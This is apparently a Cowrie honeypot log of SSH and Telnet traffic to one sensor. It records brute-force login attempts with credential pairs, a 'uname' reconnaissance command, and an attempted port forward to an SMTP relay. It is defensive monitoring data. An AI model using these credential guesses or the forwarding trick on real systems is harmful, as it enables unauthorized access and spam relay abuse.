{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:47:07.106495Z","src_ip":"212.227.235.229","session":"eb0d3ee4efc6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51944,"dst_ip":"1.2.3.4","dst_port":22,"session":"a47e4abdbbff","protocol":"ssh","message":"New connection: 217.72.205.35:51944 (1.2.3.4:22) [session: a47e4abdbbff]","sensor":"my-vps","timestamp":"2025-08-28T18:48:05.521758Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:48:05.523902Z","src_ip":"217.72.205.35","session":"a47e4abdbbff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53933,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bc3cdb03722","protocol":"ssh","message":"New connection: 212.227.235.229:53933 (1.2.3.4:22) [session: 8bc3cdb03722]","sensor":"my-vps","timestamp":"2025-08-28T18:49:52.059525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:49:52.060461Z","src_ip":"212.227.235.229","session":"8bc3cdb03722"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:49:52.195120Z","src_ip":"212.227.235.229","session":"8bc3cdb03722"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T18:49:52.795864Z","src_ip":"212.227.235.229","session":"8bc3cdb03722"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:49:54.296008Z","src_ip":"212.227.235.229","session":"8bc3cdb03722"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.219","src_port":49965,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd959a9cba40","protocol":"ssh","message":"New connection: 205.210.31.219:49965 (1.2.3.4:22) [session: cd959a9cba40]","sensor":"my-vps","timestamp":"2025-08-28T18:49:59.225355Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:49:59.567750Z","src_ip":"205.210.31.219","session":"cd959a9cba40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58422,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c86018a9ee3","protocol":"ssh","message":"New connection: 212.227.235.229:58422 (1.2.3.4:22) [session: 7c86018a9ee3]","sensor":"my-vps","timestamp":"2025-08-28T18:50:26.118990Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:50:26.296783Z","src_ip":"212.227.235.229","session":"7c86018a9ee3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58430,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d84e2e73718","protocol":"ssh","message":"New connection: 212.227.235.229:58430 (1.2.3.4:22) [session: 3d84e2e73718]","sensor":"my-vps","timestamp":"2025-08-28T18:50:26.475384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:50:26.476377Z","src_ip":"212.227.235.229","session":"3d84e2e73718"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T18:50:26.654975Z","src_ip":"212.227.235.229","session":"3d84e2e73718"}
{"eventid":"cowrie.login.success","username":"root","password":"git123","message":"login attempt [root/git123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:50:27.193270Z","src_ip":"212.227.235.229","session":"3d84e2e73718"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:50:27.565575Z","src_ip":"212.227.235.229","session":"3d84e2e73718"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:50:27.566469Z","src_ip":"212.227.235.229","session":"3d84e2e73718"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:50:27.747246Z","src_ip":"212.227.235.229","session":"3d84e2e73718"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:50:27.748685Z","src_ip":"212.227.235.229","session":"3d84e2e73718"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54966,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dd9286804f1","protocol":"ssh","message":"New connection: 212.227.235.229:54966 (1.2.3.4:22) [session: 3dd9286804f1]","sensor":"my-vps","timestamp":"2025-08-28T18:50:43.963767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:50:43.964806Z","src_ip":"212.227.235.229","session":"3dd9286804f1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:50:44.063979Z","src_ip":"212.227.235.229","session":"3dd9286804f1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu123","message":"login attempt [ubuntu/ubuntu123] failed","sensor":"my-vps","timestamp":"2025-08-28T18:50:44.364437Z","src_ip":"212.227.235.229","session":"3dd9286804f1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:50:45.465924Z","src_ip":"212.227.235.229","session":"3dd9286804f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65192,"dst_ip":"1.2.3.4","dst_port":22,"session":"c57fc4061298","protocol":"ssh","message":"New connection: 212.227.125.160:65192 (1.2.3.4:22) [session: c57fc4061298]","sensor":"my-vps","timestamp":"2025-08-28T18:51:55.787382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:51:55.788381Z","src_ip":"212.227.125.160","session":"c57fc4061298"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:51:55.869612Z","src_ip":"212.227.125.160","session":"c57fc4061298"}
{"eventid":"cowrie.login.success","username":"root","password":"BHRT**56$wx*%*St","message":"login attempt [root/BHRT**56$wx*%*St] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:51:56.276445Z","src_ip":"212.227.125.160","session":"c57fc4061298"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T18:51:56.358235Z","session":"c57fc4061298"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T18:51:56.439590Z","src_ip":"212.227.125.160","session":"c57fc4061298"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:51:56.521645Z","src_ip":"212.227.125.160","session":"c57fc4061298"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62327,"dst_ip":"1.2.3.4","dst_port":22,"session":"48d94d60e2d9","protocol":"ssh","message":"New connection: 212.227.235.229:62327 (1.2.3.4:22) [session: 48d94d60e2d9]","sensor":"my-vps","timestamp":"2025-08-28T18:52:46.426928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:52:46.597813Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:52:46.729848Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett","message":"login attempt [bennett/bennett] failed","sensor":"my-vps","timestamp":"2025-08-28T18:52:48.578396Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett1","message":"login attempt [bennett/bennett1] failed","sensor":"my-vps","timestamp":"2025-08-28T18:52:49.715643Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett123","message":"login attempt [bennett/bennett123] failed","sensor":"my-vps","timestamp":"2025-08-28T18:52:50.854120Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett1234","message":"login attempt [bennett/bennett1234] failed","sensor":"my-vps","timestamp":"2025-08-28T18:52:51.989916Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett12345","message":"login attempt [bennett/bennett12345] failed","sensor":"my-vps","timestamp":"2025-08-28T18:52:53.131173Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:52:54.269898Z","src_ip":"212.227.235.229","session":"48d94d60e2d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48388,"dst_ip":"1.2.3.4","dst_port":22,"session":"cafd28c9171c","protocol":"ssh","message":"New connection: 212.227.235.229:48388 (1.2.3.4:22) [session: cafd28c9171c]","sensor":"my-vps","timestamp":"2025-08-28T18:53:31.268945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:53:31.269866Z","src_ip":"212.227.235.229","session":"cafd28c9171c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:53:31.374945Z","src_ip":"212.227.235.229","session":"cafd28c9171c"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T18:53:31.691246Z","src_ip":"212.227.235.229","session":"cafd28c9171c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:53:32.798116Z","src_ip":"212.227.235.229","session":"cafd28c9171c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60070,"dst_ip":"1.2.3.4","dst_port":22,"session":"3de43cd38314","protocol":"ssh","message":"New connection: 217.72.205.35:60070 (1.2.3.4:22) [session: 3de43cd38314]","sensor":"my-vps","timestamp":"2025-08-28T18:54:52.037947Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:54:52.039799Z","src_ip":"217.72.205.35","session":"3de43cd38314"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59772,"dst_ip":"1.2.3.4","dst_port":22,"session":"adff5109929c","protocol":"ssh","message":"New connection: 212.227.235.229:59772 (1.2.3.4:22) [session: adff5109929c]","sensor":"my-vps","timestamp":"2025-08-28T18:54:53.208921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:54:53.213278Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:54:53.316818Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27061992","message":"login attempt [admin/27061992] failed","sensor":"my-vps","timestamp":"2025-08-28T18:54:53.774585Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27061986","message":"login attempt [admin/27061986] failed","sensor":"my-vps","timestamp":"2025-08-28T18:54:54.880795Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27051982","message":"login attempt [admin/27051982] failed","sensor":"my-vps","timestamp":"2025-08-28T18:54:55.987688Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27041982","message":"login attempt [admin/27041982] failed","sensor":"my-vps","timestamp":"2025-08-28T18:54:57.094932Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27021983","message":"login attempt [admin/27021983] failed","sensor":"my-vps","timestamp":"2025-08-28T18:54:58.202024Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:54:59.307986Z","src_ip":"212.227.235.229","session":"adff5109929c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63228,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5759b0b7d38","protocol":"ssh","message":"New connection: 212.227.235.229:63228 (1.2.3.4:22) [session: c5759b0b7d38]","sensor":"my-vps","timestamp":"2025-08-28T18:56:35.414343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:56:57.114862Z","src_ip":"212.227.235.229","session":"c5759b0b7d38"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T18:56:57.115848Z","src_ip":"212.227.235.229","session":"c5759b0b7d38"}
{"eventid":"cowrie.session.connect","src_ip":"223.76.207.252","src_port":37049,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce2ba24f7d80","protocol":"telnet","message":"New connection: 223.76.207.252:37049 (1.2.3.4:23) [session: ce2ba24f7d80]","sensor":"my-vps","timestamp":"2025-08-28T18:57:16.158740Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58418,"dst_ip":"1.2.3.4","dst_port":22,"session":"d78604ed5812","protocol":"ssh","message":"New connection: 212.227.235.229:58418 (1.2.3.4:22) [session: d78604ed5812]","sensor":"my-vps","timestamp":"2025-08-28T18:57:41.873669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:57:41.874460Z","src_ip":"212.227.235.229","session":"d78604ed5812"}
